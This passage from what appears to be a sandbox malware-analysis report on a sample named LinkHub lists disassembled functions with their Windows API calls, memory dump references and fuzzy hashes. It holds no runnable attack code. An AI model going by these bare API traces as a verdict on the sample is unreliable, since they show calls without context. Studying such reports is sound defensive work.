                                                                                        • Opcode Fuzzy Hash: 9a1c1d99a9a5fcf016e30a723ba26000c4b65c13cb18f5f3dae43b12474f48bb
                                                                                        • Instruction Fuzzy Hash: 58414871A30115ABEB297FF99C46A7E7AA8EF41330F140225F428D6291EB7548B14A61
                                                                                        Function 00282533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 0028255A
                                                                                        • WSAGetLastError.WSOCK32 ref: 00282568
                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002825E7
                                                                                        • WSAGetLastError.WSOCK32 ref: 002825F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$socket
                                                                                        • String ID:
                                                                                        • API String ID: 1881357543-0
                                                                                        • Opcode ID: afb528d54145d6b97244ab1a77b2f1965cb78ae0281bd9fc6baa76ee64d54c95
                                                                                        • Instruction ID: 48c12ab91b85f57e62b9b14bc1d01c70b67c47e2feb96fab129eebc912627a9e
                                                                                        • Opcode Fuzzy Hash: afb528d54145d6b97244ab1a77b2f1965cb78ae0281bd9fc6baa76ee64d54c95
                                                                                        • Instruction Fuzzy Hash: C441E578A10301AFE720AF24D886F6677E4AB04718F54C448F6159F2D3D772ED628B90
                                                                                        Function 00296CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00296D1A
                                                                                        • ScreenToClient.USER32(?,?), ref: 00296D4D
                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00296DBA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3880355969-0
                                                                                        • Opcode ID: 93ae6ca01d1dbeed40fc2771e0fc1affa57022aa7d5df2c54275d089614bd517
                                                                                        • Instruction ID: 9752c53265522d824517c6725a0e44cacc0c9c6296b341e728914638642e8cf5
                                                                                        • Opcode Fuzzy Hash: 93ae6ca01d1dbeed40fc2771e0fc1affa57022aa7d5df2c54275d089614bd517
                                                                                        • Instruction Fuzzy Hash: B2511C74A10209EFCF24DF64D8889AE7BF6FF54360F20815AF9659B290D730AD91CB50
                                                                                        Function 0023B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8bf0b75365219aaf7a71496c75e4ce76bbd198a27fc0ec4dd4013dd064e99426
                                                                                        • Instruction ID: de5af58ae4d3e5e3cd2b0832bcfe05e4172f0a976eb064aeb4d74ed4f551b658
                                                                                        • Opcode Fuzzy Hash: 8bf0b75365219aaf7a71496c75e4ce76bbd198a27fc0ec4dd4013dd064e99426
                                                                                        • Instruction Fuzzy Hash: FF41FBB1A20704FFD725AF78CC41B6ABBEDEB84710F10853AF611DB291D77199258B90
                                                                                        Function 0027611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002761C8
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 002761EE
                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00276213
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0027623F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 3321077145-0
                                                                                        • Opcode ID: 32fa4cf5b1d61d42840599c4bfef511f449eed4baaa54f78e1495ea83bce7f2f
                                                                                        • Instruction ID: b94c9b84b8c2815da6956aba7bb2c79c5b7d101bd03999f49678743a830e8056
                                                                                        • Opcode Fuzzy Hash: 32fa4cf5b1d61d42840599c4bfef511f449eed4baaa54f78e1495ea83bce7f2f
                                                                                        • Instruction Fuzzy Hash: F5411835610A11DFCB11EF14C559A1ABBE2AF89710B198488ED4A9B3A3CB30FD51DF91
                                                                                        Function 0026B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0026B473
                                                                                        • SetKeyboardState.USER32(00000080), ref: 0026B48F
                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0026B4FD
                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0026B54F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 4bc19b1bd459bfacc0a96638a51d14803fcc656ee36cad5f1497ff9d4324ab6b
                                                                                        • Instruction ID: 0a8d8cf479d666f9567de7e7f1975a6b41c98cd5b11e5daa41b16461b18b6a8a
                                                                                        • Opcode Fuzzy Hash: 4bc19b1bd459bfacc0a96638a51d14803fcc656ee36cad5f1497ff9d4324ab6b
                                                                                        • Instruction Fuzzy Hash: A1318D70A202496EFF32CF24D8187FA7B79AF44310F44421AE192D61D2C77489E18BA1
                                                                                        Function 0026B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0026B5B8
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 0026B5D4
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 0026B63B
                                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0026B68D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 0ce067e676a47f6e80a72f53160b6280e8a7728c2e59b60793c80ea49c8662ad
                                                                                        • Instruction ID: 17e8addd8a08376e694f2fe2e391374a389096e56622696fc91debbcc1d5e2a8
                                                                                        • Opcode Fuzzy Hash: 0ce067e676a47f6e80a72f53160b6280e8a7728c2e59b60793c80ea49c8662ad
                                                                                        • Instruction Fuzzy Hash: D1312B30D606096EFF368F65C8097FA7BAEEF85310F04822AE485D61D1C3748AE59B91
                                                                                        Function 002980AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 002980D4
                                                                                        • GetWindowRect.USER32(?,?), ref: 0029814A
                                                                                        • PtInRect.USER32(?,?,?), ref: 0029815A
                                                                                        • MessageBeep.USER32(00000000), ref: 002981C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: 90766ef4cb0dfa0298a53508092f70e6aa57260e9fa05b70f59aa06d32ce407b
                                                                                        • Instruction ID: ae87fd42c16d5408e3c21a28601b3dbd51aa2d1867dfab128dce97c072e8e56d
                                                                                        • Opcode Fuzzy Hash: 90766ef4cb0dfa0298a53508092f70e6aa57260e9fa05b70f59aa06d32ce407b
                                                                                        • Instruction Fuzzy Hash: F941BF30A11215DFCF15CF58E884AA9B7F5FF46314F1840A9EA489B261CB31EC56CF40
                                                                                        Function 00292176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00292187
                                                                                          • Part of subcall function 00264393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002643AD
                                                                                          • Part of subcall function 00264393: GetCurrentThreadId.KERNEL32 ref: 002643B4
                                                                                          • Part of subcall function 00264393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00262F00), ref: 002643BB
                                                                                        • GetCaretPos.USER32(?), ref: 0029219B
                                                                                        • ClientToScreen.USER32(00000000,?), ref: 002921E8
                                                                                        • GetForegroundWindow.USER32 ref: 002921EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                        • String ID:
                                                                                        • API String ID: 2759813231-0
                                                                                        • Opcode ID: 1b77af143a57ce0e603ff55a432163a68d31315c57de94a1bb795004e9661300
                                                                                        • Instruction ID: 8eec594abbbb3e6823eabc7fa1bf173e5e4598f2d1750e73a650c5eb69981495
                                                                                        • Opcode Fuzzy Hash: 1b77af143a57ce0e603ff55a432163a68d31315c57de94a1bb795004e9661300
                                                                                        • Instruction Fuzzy Hash: CF317271D10209AFCB04EFA9C881CAEB7FCEF48304B5484AAE455E7252D7719E55CFA0
                                                                                        Function 0026E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 002041EA: _wcslen.LIBCMT ref: 002041EF
                                                                                        • _wcslen.LIBCMT ref: 0026E8E2
                                                                                        • _wcslen.LIBCMT ref: 0026E8F9
                                                                                        • _wcslen.LIBCMT ref: 0026E924
                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0026E92F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$ExtentPoint32Text
                                                                                        • String ID:
                                                                                        • API String ID: 3763101759-0
                                                                                        • Opcode ID: 88e1fefbd5834a70dab62a741245fea4b0246c117d1c8d6d863fd3a1e07cc58e
                                                                                        • Instruction ID: 3cd01888e3926bcde9d36bcf1044f6858c465ad291e88ea0c91a4c2ab2d18fd3
                                                                                        • Opcode Fuzzy Hash: 88e1fefbd5834a70dab62a741245fea4b0246c117d1c8d6d863fd3a1e07cc58e
                                                                                        • Instruction Fuzzy Hash: 7E21D375D11225FFCB10AFA8D982BAEB7F8EF45350F114065F804BB281D6709E618BA1
                                                                                        Function 0026DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(?,0029DC30), ref: 0026DBA6
                                                                                        • GetLastError.KERNEL32 ref: 0026DBB5
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0026DBC4
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0029DC30), ref: 0026DC21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 2267087916-0
                                                                                        • Opcode ID: 376ec96c4bf759a61b2cf0be54e9272eb9953094104627721e98ded1ef092c3c
                                                                                        • Instruction ID: b3562fb287d05ac7369ff3a39fdd7b4d4b6610fd0c8f19ecd32fa7c0f958d295
                                                                                        • Opcode Fuzzy Hash: 376ec96c4bf759a61b2cf0be54e9272eb9953094104627721e98ded1ef092c3c
                                                                                        • Instruction Fuzzy Hash: DC21A630A243099FC710DF28C98495BB7E8EE5A764F100A1AF499C32E2D770D996DF52
                                                                                        Function 0029321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 002932A6
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002932C0
                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002932CE
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002932DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                        • String ID:
                                                                                        • API String ID: 2169480361-0
                                                                                        • Opcode ID: 08a64b81bc0a6d8c72cf658baefccaf119440a464b2d0f8d21ce4db593eab068
                                                                                        • Instruction ID: 3b1ff83bb8cb8e41474a4e740e337846475c5195f452f6de769e9e168f8a8553
                                                                                        • Opcode Fuzzy Hash: 08a64b81bc0a6d8c72cf658baefccaf119440a464b2d0f8d21ce4db593eab068
                                                                                        • Instruction Fuzzy Hash: 73210631614111AFDB14DF24CC45FAABB99EF85314F248259F82A8B2D2C771ED51CBD0
                                                                                        Function 0026825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 002696E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00268271,?,000000FF,?,002690BB,00000000,?,0000001C,?,?), ref: 002696F3
                                                                                          • Part of subcall function 002696E4: lstrcpyW.KERNEL32(00000000,?,?,00268271,?,000000FF,?,002690BB,00000000,?,0000001C,?,?,00000000), ref: 00269719
                                                                                          • Part of subcall function 002696E4: lstrcmpiW.KERNEL32(00000000,?,00268271,?,000000FF,?,002690BB,00000000,?,0000001C,?,?), ref: 0026974A
                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002690BB,00000000,?,0000001C,?,?,00000000), ref: 0026828A
                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,002690BB,00000000,?,0000001C,?,?,00000000), ref: 002682B0
                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,002690BB,00000000,?,0000001C,?,?,00000000), ref: 002682EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        • Opcode ID: c7b47baa30120792e287303e55e763d1b8d6a299d2a9c54f8fcdd9a5bfa2ade3
                                                                                        • Instruction ID: b451c7ac4183ba06f9ba4139c6cd65440997484cad5bec559236137e1a5c4a15
                                                                                        • Opcode Fuzzy Hash: c7b47baa30120792e287303e55e763d1b8d6a299d2a9c54f8fcdd9a5bfa2ade3
                                                                                        • Instruction Fuzzy Hash: 6D11263A210382ABCB149F38D849E7A77A9FF49750B50412AF946C7260EF71D8B1DB90
                                                                                        Function 002960FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 0029615A
                                                                                        • _wcslen.LIBCMT ref: 0029616C
                                                                                        • _wcslen.LIBCMT ref: 00296177
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 002962B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 455545452-0
                                                                                        • Opcode ID: 9def2ea098e7e673398086ca8ebcc92e638848802420fd90755ca9958de4df2d
                                                                                        • Instruction ID: 42095c5583143996870ccb3e7a87311f12259964a349e98a7f43f9f609943b6b
                                                                                        • Opcode Fuzzy Hash: 9def2ea098e7e673398086ca8ebcc92e638848802420fd90755ca9958de4df2d
                                                                                        • Instruction Fuzzy Hash: 6E110631A30219A6DF10DFA49C88AEF77BCEF127A0F10402BF905D5181E7B4C964DB60
                                                                                        Function 00232079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 85eff372cd8e405682536ddd7623658951f07777b4a5f8d1ba333231169b5156
                                                                                        • Instruction ID: 76b04404ff8e528b10300acfab7b2b8a329ec3df7451d2d6f41b5357b7b1eb2b
                                                                                        • Opcode Fuzzy Hash: 85eff372cd8e405682536ddd7623658951f07777b4a5f8d1ba333231169b5156
                                                                                        • Instruction Fuzzy Hash: 9801ADF223961ABEF7252A78BCC0F27670DDF61BB8F340326B521A11D1DA608C6C9560
                                                                                        Function 00262374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00262394
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002623A6
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002623BC
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002623D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 918b768d250e7e2aea193f8dfe73a788b81fe0610a386df464c65eac0571bd4c
                                                                                        • Instruction ID: b44d3af819f6aee7862b5ac5e2b2bc943e0e52ac812f0d207be2c72a05922722
                                                                                        • Opcode Fuzzy Hash: 918b768d250e7e2aea193f8dfe73a788b81fe0610a386df464c65eac0571bd4c
                                                                                        • Instruction Fuzzy Hash: 6711F73A900219FFEB119BA5CD85F9DBB78EB08750F200092EA01B7290D7716E64DB94
                                                                                        Function 0026EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0026EB14
